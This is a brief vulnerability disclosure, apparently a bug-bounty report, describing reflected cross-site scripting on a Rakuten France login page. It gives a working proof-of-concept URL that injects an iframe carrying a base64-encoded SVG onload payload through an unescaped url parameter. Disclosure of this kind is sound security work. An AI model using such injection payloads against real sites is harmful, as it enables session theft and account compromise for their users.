Summary by Poc-as
Summary
I found a cross site scripting on https://fr.shopping.rakuten.com/connect
POC
url : https://fr.shopping.rakuten.com/connect?url="><iframe%20src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2b"></iframe>
Explanation
When I connect to the above URL, the value of the url parameter is inserted into the DOM without escaping, resulting in HTML Injection. So I can use this to be trigger XSS because HTML Injection happens. Thanks